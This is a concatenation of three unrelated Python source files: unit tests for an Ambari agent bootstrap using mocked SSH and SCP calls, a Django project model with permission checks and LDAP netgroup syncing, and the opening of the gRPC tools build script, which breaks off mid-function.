scp_run_mock.side_effect = [expected1, expected3]
ssh_run_mock.side_effect = [expected2, expected4]
res = bootstrap_obj.copyNeededFiles()
self.assertEquals(res, expected3["exitstatus"])
#
#Ambari repo file does not exist
#
os_path_exists_mock.side_effect = None
os_path_exists_mock.return_value = False
#Expectations:
# SSH will not be called at all
# SCP will be called once for copying the setup script file
scp_run_mock.reset_mock()
ssh_run_mock.reset_mock()
expectedResult = {"exitstatus": 33, "log": "log33", "errormsg": "errorMsg"}
scp_run_mock.side_effect = [expectedResult]
res = bootstrap_obj.copyNeededFiles()
self.assertFalse(ssh_run_mock.called)
self.assertEquals(res, expectedResult["exitstatus"])
@patch.object(BootstrapDefault, "getOsCheckScriptRemoteLocation")
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
def test_runOsCheckScript(self, write_mock, run_mock,
init_mock, getOsCheckScriptRemoteLocation_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
getOsCheckScriptRemoteLocation_mock.return_value = "OsCheckScriptRemoteLocation"
expected = 42
init_mock.return_value = None
run_mock.return_value = expected
res = bootstrap_obj.runOsCheckScript()
self.assertEquals(res, expected)
command = str(init_mock.call_args[0][4])
self.assertEqual(command,
"chmod a+x OsCheckScriptRemoteLocation && "
"env PYTHONPATH=$PYTHONPATH:/var/lib/ambari-agent/tmp OsCheckScriptRemoteLocation centos6")
@patch.object(SSH, "__init__")
@patch.object(BootstrapDefault, "getRunSetupCommand")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
def test_runSetupAgent(self, write_mock, run_mock,
getRunSetupCommand_mock, init_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
getRunSetupCommand_mock.return_value = "RunSetupCommand"
expected = 42
init_mock.return_value = None
run_mock.return_value = expected
res = bootstrap_obj.runSetupAgent()
self.assertEquals(res, expected)
command = str(init_mock.call_args[0][4])
self.assertEqual(command, "RunSetupCommand")
@patch.object(BootstrapDefault, "hasPassword")
@patch.object(BootstrapDefault, "getRunSetupWithPasswordCommand")
@patch.object(BootstrapDefault, "getRunSetupWithoutPasswordCommand")
def test_getRunSetupCommand(self, getRunSetupWithoutPasswordCommand_mock,
getRunSetupWithPasswordCommand_mock,
hasPassword_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
# With password
hasPassword_mock.return_value = True
getRunSetupWithPasswordCommand_mock.return_value = "RunSetupWithPasswordCommand"
getRunSetupWithoutPasswordCommand_mock.return_value = "RunSetupWithoutPasswordCommand"
res = bootstrap_obj.getRunSetupCommand("dummy-host")
self.assertEqual(res, "RunSetupWithPasswordCommand")
# Without password
hasPassword_mock.return_value = False
res = bootstrap_obj.getRunSetupCommand("dummy-host")
self.assertEqual(res, "RunSetupWithoutPasswordCommand")
@patch.object(HostLog, "write")
def test_createDoneFile(self, write_mock):
tmp_dir = tempfile.gettempdir()
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", tmp_dir,
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
done_file = os.path.join(tmp_dir, "hostname.done")
expected = 42
bootstrap_obj.createDoneFile(expected)
with open(done_file) as df:
res = df.read()
self.assertEqual(res, str(expected))
os.unlink(done_file)
@patch.object(OSCheck, "is_suse_family")
@patch.object(OSCheck, "is_ubuntu_family")
@patch.object(OSCheck, "is_redhat_family")
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
def test_checkSudoPackage(self, write_mock, run_mock, init_mock, is_redhat_family, is_ubuntu_family, is_suse_family):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
expected = 42
init_mock.return_value = None
run_mock.return_value = expected
is_redhat_family.return_value = True
is_ubuntu_family.return_value = False
is_suse_family.return_value = False
res = bootstrap_obj.checkSudoPackage()
self.assertEquals(res, expected)
command = str(init_mock.call_args[0][4])
self.assertEqual(command, "[ \"$EUID\" -eq 0 ] || rpm -qa | grep -e '^sudo\-'")
@patch.object(OSCheck, "is_suse_family")
@patch.object(OSCheck, "is_ubuntu_family")
@patch.object(OSCheck, "is_redhat_family")
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
def test_checkSudoPackageUbuntu(self, write_mock, run_mock, init_mock,
is_redhat_family, is_ubuntu_family, is_suse_family):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "ubuntu12",
None, "8440", "root")
is_redhat_family.return_value = False
is_ubuntu_family.return_value = True
is_suse_family.return_value = False
bootstrap_obj = Bootstrap("hostname", shared_state)
expected = 42
init_mock.return_value = None
run_mock.return_value = expected
res = bootstrap_obj.checkSudoPackage()
self.assertEquals(res, expected)
command = str(init_mock.call_args[0][4])
self.assertEqual(command, "[ \"$EUID\" -eq 0 ] || dpkg --get-selections|grep -e '^sudo\s*install'")
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
@patch.object(BootstrapDefault, "getPasswordFile")
def test_deletePasswordFile(self, getPasswordFile_mock, write_mock, run_mock,
init_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
expected = 42
getPasswordFile_mock.return_value = "PasswordFile"
init_mock.return_value = None
run_mock.return_value = expected
res = bootstrap_obj.deletePasswordFile()
self.assertEquals(res, expected)
command = str(init_mock.call_args[0][4])
self.assertEqual(command, "rm PasswordFile")
@patch.object(BootstrapDefault, "getPasswordFile")
@patch.object(SCP, "__init__")
@patch.object(SCP, "run")
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
def test_copyPasswordFile(self, write_mock, ssh_run_mock,
ssh_init_mock, scp_run_mock,
scp_init_mock, getPasswordFile_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root", password_file="PasswordFile")
bootstrap_obj = Bootstrap("hostname", shared_state)
getPasswordFile_mock.return_value = "PasswordFile"
# Testing max retcode return
expected1 = {"exitstatus": 42, "log": "log42", "errormsg": "errorMsg"}
expected2 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
scp_init_mock.return_value = None
scp_run_mock.return_value = expected1
ssh_init_mock.return_value = None
ssh_run_mock.return_value = expected2
res = bootstrap_obj.copyPasswordFile()
self.assertEquals(res, expected1["exitstatus"])
input_file = str(scp_init_mock.call_args[0][4])
remote_file = str(scp_init_mock.call_args[0][4])
self.assertEqual(input_file, "PasswordFile")
self.assertEqual(remote_file, "PasswordFile")
command = str(ssh_init_mock.call_args[0][4])
self.assertEqual(command, "chmod 600 PasswordFile")
# Another order
expected1 = {"exitstatus": 0, "log": "log0", "errormsg": "errorMsg"}
expected2 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
scp_run_mock.return_value = expected1
ssh_run_mock.return_value = expected2
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
@patch.object(BootstrapDefault, "getPasswordFile")
def test_changePasswordFileModeOnHost(self, getPasswordFile_mock, write_mock,
run_mock, init_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
expected = 42
getPasswordFile_mock.return_value = "PasswordFile"
init_mock.return_value = None
run_mock.return_value = expected
res = bootstrap_obj.changePasswordFileModeOnHost()
self.assertEquals(res, expected)
command = str(init_mock.call_args[0][4])
self.assertEqual(command, "chmod 600 PasswordFile")
@patch.object(HostLog, "write")
def test_try_to_execute(self, write_mock):
expected = 43
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
# Normal case
def act_normal_return_int():
return 43
ret = bootstrap_obj.try_to_execute(act_normal_return_int)
self.assertEqual(ret["exitstatus"], expected)
self.assertFalse(write_mock.called)
write_mock.reset_mock()
def act_normal_return():
return {"exitstatus": 43}
ret = bootstrap_obj.try_to_execute(act_normal_return)
self.assertEqual(ret["exitstatus"], expected)
self.assertFalse(write_mock.called)
write_mock.reset_mock()
# Exception scenario
def act():
raise IOError()
ret = bootstrap_obj.try_to_execute(act)
self.assertEqual(ret["exitstatus"], 177)
self.assertTrue(write_mock.called)
@patch.object(BootstrapDefault, "try_to_execute")
@patch.object(BootstrapDefault, "hasPassword")
@patch.object(BootstrapDefault, "createDoneFile")
@patch.object(HostLog, "write")
@patch("logging.warn")
@patch("logging.error")
def test_run(self, error_mock, warn_mock, write_mock, createDoneFile_mock,
hasPassword_mock, try_to_execute_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
# Testing workflow without password
bootstrap_obj.copied_password_file = False
hasPassword_mock.return_value = False
try_to_execute_mock.return_value = {"exitstatus": 0, "log":"log0", "errormsg":"errormsg0"}
bootstrap_obj.run()
self.assertEqual(try_to_execute_mock.call_count, 10) # <- Adjust if changed
self.assertTrue(createDoneFile_mock.called)
self.assertEqual(bootstrap_obj.getStatus()["return_code"], 0)
try_to_execute_mock.reset_mock()
createDoneFile_mock.reset_mock()
# Testing workflow with password
bootstrap_obj.copied_password_file = True
hasPassword_mock.return_value = True
try_to_execute_mock.return_value = {"exitstatus": 0, "log":"log0", "errormsg":"errormsg0"}
bootstrap_obj.run()
self.assertEqual(try_to_execute_mock.call_count, 13) # <- Adjust if changed
self.assertTrue(createDoneFile_mock.called)
self.assertEqual(bootstrap_obj.getStatus()["return_code"], 0)
error_mock.reset_mock()
write_mock.reset_mock()
try_to_execute_mock.reset_mock()
createDoneFile_mock.reset_mock()
# Testing workflow when some action failed before copying password
bootstrap_obj.copied_password_file = False
hasPassword_mock.return_value = False
try_to_execute_mock.side_effect = [{"exitstatus": 0, "log":"log0", "errormsg":"errormsg0"}, {"exitstatus": 1, "log":"log1", "errormsg":"errormsg1"}]
bootstrap_obj.run()
self.assertEqual(try_to_execute_mock.call_count, 2) # <- Adjust if changed
self.assertTrue("ERROR" in error_mock.call_args[0][0])
self.assertTrue("ERROR" in write_mock.call_args[0][0])
self.assertTrue(createDoneFile_mock.called)
self.assertEqual(bootstrap_obj.getStatus()["return_code"], 1)
try_to_execute_mock.reset_mock()
createDoneFile_mock.reset_mock()
# Testing workflow when some action failed after copying password
bootstrap_obj.copied_password_file = True
hasPassword_mock.return_value = True
try_to_execute_mock.side_effect = [{"exitstatus": 0, "log":"log0", "errormsg":"errormsg0"}, {"exitstatus": 42, "log":"log42", "errormsg":"errormsg42"}, {"exitstatus": 0, "log":"log0", "errormsg":"errormsg0"}]
bootstrap_obj.run()
self.assertEqual(try_to_execute_mock.call_count, 3) # <- Adjust if changed
self.assertTrue(createDoneFile_mock.called)
self.assertEqual(bootstrap_obj.getStatus()["return_code"], 42)
error_mock.reset_mock()
write_mock.reset_mock()
try_to_execute_mock.reset_mock()
createDoneFile_mock.reset_mock()
# Testing workflow when some action failed after copying password and
# removing password failed too
bootstrap_obj.copied_password_file = True
hasPassword_mock.return_value = True
try_to_execute_mock.side_effect = [{"exitstatus": 0, "log":"log0", "errormsg":"errormsg0"}, {"exitstatus": 17, "log":"log17", "errormsg":"errormsg17"}, {"exitstatus": 19, "log":"log19", "errormsg":"errormsg19"}]
bootstrap_obj.run()
self.assertEqual(try_to_execute_mock.call_count, 3) # <- Adjust if changed
self.assertTrue("ERROR" in write_mock.call_args_list[0][0][0])
self.assertTrue("ERROR" in error_mock.call_args[0][0])
self.assertTrue("WARNING" in write_mock.call_args_list[1][0][0])
self.assertTrue("WARNING" in warn_mock.call_args[0][0])
self.assertTrue(createDoneFile_mock.called)
self.assertEqual(bootstrap_obj.getStatus()["return_code"], 17)
@patch.object(BootstrapDefault, "createDoneFile")
@patch.object(HostLog, "write")
def test_interruptBootstrap(self, write_mock, createDoneFile_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
bootstrap_obj.interruptBootstrap()
self.assertTrue(createDoneFile_mock.called)
@patch("time.sleep")
@patch("time.time")
@patch("logging.warn")
@patch("logging.info")
@patch.object(BootstrapDefault, "start")
@patch.object(BootstrapDefault, "interruptBootstrap")
@patch.object(BootstrapDefault, "getStatus")
def test_PBootstrap(self, getStatus_mock, interruptBootstrap_mock, start_mock,
info_mock, warn_mock, time_mock, sleep_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
n = 180
time = 100500
time_mock.return_value = time
hosts = []
for i in range(0, n):
hosts.append("host" + str(i))
# Testing normal case
getStatus_mock.return_value = {"return_code": 0,
"start_time": time + 999}
pbootstrap_obj = PBootstrap(hosts, shared_state)
pbootstrap_obj.run()
self.assertEqual(start_mock.call_count, n)
self.assertEqual(interruptBootstrap_mock.call_count, 0)
start_mock.reset_mock()
getStatus_mock.reset_mock()
# Testing case of timeout
def fake_return_code_generator():
call_number = 0
while True:
call_number += 1
if call_number % 5 != 0: # ~80% of hosts finish successfully
yield 0
else:
yield None
def fake_start_time_generator():
while True:
yield time - bootstrap.HOST_BOOTSTRAP_TIMEOUT - 1
return_code_generator = fake_return_code_generator()
start_time_generator = fake_start_time_generator()
def status_get_item_mock(item):
if item == "return_code":
return return_code_generator.next()
elif item == "start_time":
return start_time_generator.next()
dict_mock = MagicMock()
dict_mock.__getitem__.side_effect = status_get_item_mock
getStatus_mock.return_value = dict_mock
pbootstrap_obj.run()
self.assertEqual(start_mock.call_count, n)
self.assertEqual(interruptBootstrap_mock.call_count, n / 5)
| |
'''
@author: jnaous
'''
from django.db import models
from expedient.common.permissions.models import Permittee, ObjectPermission
from expedient.common.permissions.utils import permissions_save_override,\
permissions_delete_override
from expedient.clearinghouse.aggregate.models import Aggregate
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
from expedient.clearinghouse.aggregate.utils import get_aggregate_classes
from expedient.common.ldapproxy.models import LdapProxy
from django.conf import settings
from django.db import transaction
import uuid
import string
import re
from expedient.common.utils.validators import asciiValidator, descriptionLightValidator
class ProjectManager(models.Manager):
"""Manager for L{Project} instances.
Add methods to retrieve project querysets.
"""
def get_for_user(self, user):
"""Return projects for which C{user} has some permission.
@param user: The user whose projects we are looking for.
@type user: C{User}.
"""
if user.is_superuser:
return self.all()
permittee = Permittee.objects.get_as_permittee(user)
proj_ids = ObjectPermission.objects.filter_for_class(
klass=Project, permittees=permittee).values_list(
"object_id", flat=True)
return self.filter(id__in=list(proj_ids))
import logging
logger = logging.getLogger("Project.models")
class Project(models.Model):
'''
A project is a collection of users working on the same set of slices.
@cvar objects: A L{ProjectManager} instance.
@ivar name: The name of the project
@type name: L{str}
@ivar description: Short description of the project
@type description: L{str}
@ivar aggregates: Read-only property returning all aggregates that can
be used by the project (i.e. for which the project has the
"can_use_aggregate" permission).
@type aggregates: C{QuerySet} of L{Aggregate}s
@ivar researchers: Read-only property returning all users that have the
'researcher' role for the project.
@type researchers: C{QuerySet} of C{User}s.
@ivar owners: Read-only property returning all users that have the 'owner'
role for the project.
@type owners: C{QuerySet} of C{User}s.
@ivar members: Read-only property returning all users that have some
permission in the project.
@type members: C{QuerySet} of C{User}s.
@ivar members_as_permittees: Read-only property returning all users
that have some permission in the project as Permittee instances.
@type members_as_permittees: C{QuerySet} of L{Permittee}s.
'''
objects = ProjectManager()
name = models.CharField(max_length=200, unique=True, validators=[asciiValidator])
description = models.TextField(validators=[descriptionLightValidator])
uuid = models.CharField(max_length=200, default = "", unique=True, editable =False)
'''
save = permissions_save_override(
permittee_kw="user",
model_func=lambda: Project,
create_perm="can_create_project",
edit_perm="can_edit_project",
delete_perm="can_delete_project",
)
delete = permissions_delete_override(
permittee_kw="user",
model_func=lambda: Project,
delete_perm="can_delete_project",
)
'''
# originally, code was save = permissions_save_override (...)
# in which super(model_func(), self).save(*args, **kwargs) is called
# thus the save function of our parent class.
#
# the inner save function that is return by permissions_save_override
# calls must_have_permission, which raises an PermissionDenied when
# saving is not allowed. ==> extending the save functionality does not
# require checking whether action was allowed or not when this
# exception is reaised.
def save(self, *args, **kwargs):
permissions_save_override(
permittee_kw="user",
model_func=lambda: Project,
create_perm="can_create_project",
edit_perm="can_edit_project",
delete_perm="can_delete_project",
)
super(Project, self).save(*args, **kwargs)
if settings.LDAP_STORE_PROJECTS and self.uuid:
self.sync_netgroup_ldap()
def delete(self, *args, **kwargs):
from vt_plugin.models.VM import VM
if VM.objects.filter(projectId = self.uuid):
raise Exception("Project still have VMs")
permissions_delete_override(
permittee_kw="user",
model_func=lambda: Project,
delete_perm="can_delete_project",
)
if settings.LDAP_STORE_PROJECTS:
self.delete_netgroup_ldap()
super(Project, self).delete(*args, **kwargs)
def _get_aggregates(self):
"""Get all aggregates that can be used by the project
(i.e. for which the project has the "can_use_aggregate" permission).
"""
# Permissions are given to the leaf classes
agg_ids = []
agg_classes = get_aggregate_classes()
permittee = Permittee.objects.get_as_permittee(self)
for agg_class in agg_classes:
agg_ids.extend(
ObjectPermission.objects.filter_for_class(
agg_class,
permission__name="can_use_aggregate",
permittees=permittee,
).values_list("object_id", flat=True)
)
#TODO: marc comented this
return Aggregate.objects.filter(pk__in=agg_ids)
#return Aggregate.objects
aggregates=property(_get_aggregates)
def _get_researchers(self):
"""Get all users who have the 'researcher' role for the project"""
from expedient.clearinghouse.roles.models import ProjectRole
return ProjectRole.objects.get_users_with_role('researcher', self)
researchers=property(_get_researchers)
def _get_owners(self):
"""Get all users who have the 'owner' role for the project"""
from expedient.clearinghouse.roles.models import ProjectRole
return ProjectRole.objects.get_users_with_role('owner', self)
owners=property(_get_owners)
def _get_members(self):
"""Get all users who have some permission in the project."""
user_ids = self._get_permittees().values_list("object_id", flat=True)
return User.objects.filter(pk__in=list(user_ids))
members=property(_get_members)
def _get_permittees(self):
"""Get all permittees that have some permission in the project."""
return Permittee.objects.filter_for_class(User).filter(
objectpermission__object_type=
ContentType.objects.get_for_model(Project),
objectpermission__object_id=self.id,
).distinct()
members_as_permittees=property(_get_permittees)
def _getSlices(self):
from expedient.clearinghouse.slice.models import Slice
return Slice.objects.filter(project=self)
def __unicode__(self):
s = u"Project %s" % self.name
return s
@classmethod
@models.permalink
def get_create_url(cls):
"Returns the URL to create projects"
return ("project_create",)
@models.permalink
def get_update_url(self):
"Returns the URL to update project info"
return ("project_update", (), {"proj_id": self.id})
@models.permalink
def get_detail_url(self):
"Returns the URL for the project detail page"
return ("project_detail", (), {"proj_id": self.id})
@models.permalink
def get_delete_url(self):
"Returns the URL to delete a project"
return ("project_delete", (), {"proj_id": self.id})
@models.permalink
def get_agg_add_url(self):
"Returns the URL to add an aggregate to a project"
return ("project_add_agg", (), {"proj_id": self.id})
@models.permalink
def get_agg_update_url(self, aggregate):
"Returns URL to update an aggregate's info related to the project"
return ("project_update_agg", (), {
"proj_id": self.id,
"agg_id": aggregate.id})
@models.permalink
def get_agg_remove_url(self, aggregate):
"Returns URL to remove aggregate from project"
return ("project_remove_agg", (), {
"proj_id": self.id,
"agg_id": aggregate.id})
@models.permalink
def get_member_add_url(self):
return ("project_member_add", (), {
"proj_id": self.id})
@models.permalink
def get_member_update_url(self, user):
return ("project_member_update", (), {
"proj_id": self.id,
"user_id": user.id})
@models.permalink
def get_member_remove_url(self, user):
return ("project_member_remove", (), {
"proj_id": self.id,
"user_id": user.id})
'''
LDAP synchronization
'''
def get_netgroup(self):
str = 'proj_%s_%s' % (self.uuid, self.name)
str = string.replace(str,' ','_')
str = string.replace(str,'\t','__')
return str
def get_netgroup_dn(self):
return 'cn=%s,%s' % (self.get_netgroup(), settings.LDAP_MASTER_USERNETGROUPS)
def sync_netgroup_ldap (self):
l = LdapProxy()
dn = self.get_netgroup_dn()
cn = self.get_netgroup().encode()
data = {'objectClass': ['nisNetgroup', 'top'], 'cn': [cn], 'nisNetgroupTriple': []}
for user in self._get_members():
if user.password == "!":
logger.debug("New member: "+str(user.username))
data['nisNetgroupTriple'].append("(,%s,)" % str(user.username))
logger.debug("sync_netgroup_ldap: member: %s" % str(user.username))
l.create_or_replace (dn, data)
def delete_netgroup_ldap(self):
l = LdapProxy()
dn = self.get_netgroup_dn()
l.delete (dn)
| |
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from distutils import cygwinccompiler
from distutils import extension
from distutils import util
import errno
import os
import os.path
import platform
import re
import shlex
import shutil
import subprocess
from subprocess import PIPE
import sys
import sysconfig
import pkg_resources
import setuptools
from setuptools.command import build_ext
# TODO(atash) add flag to disable Cython use
_PACKAGE_PATH = os.path.realpath(os.path.dirname(__file__))
_README_PATH = os.path.join(_PACKAGE_PATH, 'README.rst')
os.chdir(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, os.path.abspath('.'))
import _parallel_compile_patch
import protoc_lib_deps
import grpc_version
_EXT_INIT_SYMBOL = None
if sys.version_info[0] == 2:
_EXT_INIT_SYMBOL = "init_protoc_compiler"
else:
_EXT_INIT_SYMBOL = "PyInit__protoc_compiler"
_parallel_compile_patch.monkeypatch_compile_maybe()
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'License :: OSI Approved :: Apache Software License',
]
PY3 = sys.version_info.major == 3
def _env_bool_value(env_name, default):
"""Parses a bool option from an environment variable"""
return os.environ.get(env_name, default).upper() not in ['FALSE', '0', '']
# Environment variable to determine whether or not the Cython extension should
# *use* Cython or use the generated C files. Note that this requires the C files
# to have been generated by building first *with* Cython support.
BUILD_WITH_CYTHON = _env_bool_value('GRPC_PYTHON_BUILD_WITH_CYTHON', 'False')
# Export this variable to force building the python extension with a statically linked libstdc++.
# At least on linux, this is normally not needed as we can build manylinux-compatible wheels on linux just fine
# without statically linking libstdc++ (which leads to a slight increase in the wheel size).
# This option is useful when crosscompiling wheels for aarch64 where
# it's difficult to ensure that the crosscompilation toolchain has a high-enough version
# of GCC (we require >4.9) but still uses old-enough libstdc++ symbols.
# TODO(jtattermusch): remove this workaround once issues with crosscompiler version are resolved.
BUILD_WITH_STATIC_LIBSTDCXX = _env_bool_value(
'GRPC_PYTHON_BUILD_WITH_STATIC_LIBSTDCXX', 'False')
def check_linker_need_libatomic():
"""Test if linker on system needs libatomic."""
code_test = (b'#include <atomic>\n' +
b'int main() { return std::atomic<int64_t>{}; }')
cxx = os.environ.get('CXX', 'c++')
cpp_test = subprocess.Popen([cxx, '-x', 'c++', '-std=c++11', '-'],
stdin=PIPE,
stdout=PIPE,
stderr=PIPE)
cpp_test.communicate(input=code_test)
if cpp_test.returncode == 0:
return False
# Double-check to see if -latomic actually can solve the problem.
# https://github.com/grpc/grpc/issues/22491
cpp_test = subprocess.Popen(
[cxx, '-x', 'c++', '-std=c++11', '-', '-latomic'],
stdin=PIPE,
stdout=PIPE,
stderr=PIPE)
cpp_test.communicate(input=code_test)
return cpp_test.returncode == 0
class BuildExt(build_ext.build_ext):
"""Custom build_ext command."""
def get_ext_filename(self, ext_name):
# since python3.5, python extensions' shared libraries use a suffix that corresponds to the value
# of sysconfig.get_config_var('EXT_SUFFIX') and contains info about the architecture the library targets.
# E.g. on x64 linux the suffix is ".cpython-XYZ-x86_64-linux-gnu.so"
# When crosscompiling python wheels, we need to be able to override this suffix
# so that the resulting file name matches the target architecture and we end up with a well-formed
# wheel.
filename = build_ext.build_ext.get_ext_filename(self, ext_name)
orig_ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
new_ext_suffix = os.getenv('GRPC_PYTHON_OVERRIDE_EXT_SUFFIX')
if new_ext_suffix and filename.endswith(orig_ext_suffix):
filename = filename[:-len(orig_ext_suffix)] + new_ext_suffix
return filename
# There are some situations (like on Windows) where CC, CFLAGS, and LDFLAGS are
# entirely ignored/dropped/forgotten by distutils and its Cygwin/MinGW support.
# We use these environment variables to thus get around that without locking
# ourselves in w.r.t. the multitude of operating systems this ought to build on.
# We can also use these variables as a way to inject environment-specific
# compiler/linker flags. We assume GCC-like compilers and/or MinGW as a
# reasonable default.
EXTRA_ENV_COMPILE_ARGS = os.environ.get('GRPC_PYTHON_CFLAGS', None)
EXTRA_ENV_LINK_ARGS = os.environ.get('GRPC_PYTHON_LDFLAGS', None)
if EXTRA_ENV_COMPILE_ARGS is None:
EXTRA_ENV_COMPILE_ARGS = '-std=c++11'
if 'win32' in sys.platform:
if sys.version_info < (3, 5):
# We use define flags here and don't directly add to DEFINE_MACROS below to
# ensure that the expert user/builder has a way of turning it off (via the
# envvars) without adding yet more GRPC-specific envvars.
# See https://sourceforge.net/p/mingw-w64/bugs/363/
if '32' in platform.architecture()[0]:
EXTRA_ENV_COMPILE_ARGS += ' -D_ftime=_ftime32 -D_timeb=__timeb32 -D_ftime_s=_ftime32_s -D_hypot=hypot'
else:
EXTRA_ENV_COMPILE_ARGS += ' -D_ftime=_ftime64 -D_timeb=__timeb64 -D_hypot=hypot'
else:
# We need to statically link the C++ Runtime, only the C runtime is
# available dynamically
EXTRA_ENV_COMPILE_ARGS += ' /MT'
elif "linux" in sys.platform or "darwin" in sys.platform:
EXTRA_ENV_COMPILE_ARGS += ' -fno-wrapv -frtti'
if EXTRA_ENV_LINK_ARGS is None:
EXTRA_ENV_LINK_ARGS = ''
# NOTE(rbellevi): Clang on Mac OS will make all static symbols (both
# variables and objects) global weak symbols. When a process loads the
# protobuf wheel's shared object library before loading *this* C extension,
# the runtime linker will prefer the protobuf module's version of symbols.
# This results in the process using a mixture of symbols from the protobuf
# wheel and this wheel, which may be using different versions of
# libprotobuf. In the case that they *are* using different versions of
# libprotobuf *and* there has been a change in data layout (or in other
# invariants) segfaults, data corruption, or "bad things" may happen.
#
# This flag ensures that on Mac, the only global symbol is the one loaded by
# the Python interpreter. The problematic global weak symbols become local
# weak symbols. This is not required on Linux since the compiler does not
# produce global weak symbols. This is not required on Windows as our ".pyd"
# file does not contain any symbols.
#
# Finally, the leading underscore here is part of the Mach-O ABI. Unlike
# more modern ABIs (ELF et al.), Mach-O prepends an underscore to the names
# of C functions.
if "darwin" in sys.platform:
EXTRA_ENV_LINK_ARGS += ' -Wl,-exported_symbol,_{}'.format(
_EXT_INIT_SYMBOL)
if "linux" in sys.platform or "darwin" in sys.platform:
EXTRA_ENV_LINK_ARGS += ' -lpthread'
if check_linker_need_libatomic():
EXTRA_ENV_LINK_ARGS += ' -latomic'
elif "win32" in sys.platform and sys.version_info < (3, 5):
msvcr = cygwinccompiler.get_msvcr()[0]
EXTRA_ENV_LINK_ARGS += (
' -static-libgcc -static-libstdc++ -mcrtdll={msvcr}'
' -static -lshlwapi'.format(msvcr=msvcr))
EXTRA_COMPILE_ARGS = shlex.split(EXTRA_ENV_COMPILE_ARGS)
EXTRA_LINK_ARGS = shlex.split(EXTRA_ENV_LINK_ARGS)
if BUILD_WITH_STATIC_LIBSTDCXX:
EXTRA_LINK_ARGS.append('-static-libstdc++')
CC_FILES = [os.path.normpath(cc_file) for cc_file in protoc_lib_deps.CC_FILES]
PROTO_FILES = [
os.path.normpath(proto_file) for proto_file in protoc_lib_deps.PROTO_FILES
]
CC_INCLUDE = os.path.normpath(protoc_lib_deps.CC_INCLUDE)
PROTO_INCLUDE = os.path.normpath(protoc_lib_deps.PROTO_INCLUDE)
GRPC_PYTHON_TOOLS_PACKAGE = 'grpc_tools'
GRPC_PYTHON_PROTO_RESOURCES_NAME = '_proto'
DEFINE_MACROS = ()
if "win32" in sys.platform:
DEFINE_MACROS += (('WIN32_LEAN_AND_MEAN', 1),)
if '64bit' in platform.architecture()[0]:
DEFINE_MACROS += (('MS_WIN64', 1),)
elif "linux" in sys.platform or "darwin" in sys.platform:
DEFINE_MACROS += (('HAVE_PTHREAD', 1),)
# By default, Python3 distutils enforces compatibility of
# c plugins (.so files) with the OSX version Python was built with.
# We need OSX 10.10, the oldest which supports C++ thread_local.
if 'darwin' in sys.platform:
mac_target = sysconfig.get_config_var('MACOSX_DEPLOYMENT_TARGET')
if mac_target and (pkg_resources.parse_version(mac_target) <
pkg_resources.parse_version('10.10.0')):
os.environ['MACOSX_DEPLOYMENT_TARGET'] = '10.10'
os.environ['_PYTHON_HOST_PLATFORM'] = re.sub(
r'macosx-[0-9]+\.[0-9]+-(.+)', r'macosx-10.10-\1',
util.get_platform())
def package_data():
tools_path = GRPC_PYTHON_TOOLS_PACKAGE.replace('.', os.path.sep)
proto_resources_path = os.path.join(tools_path,
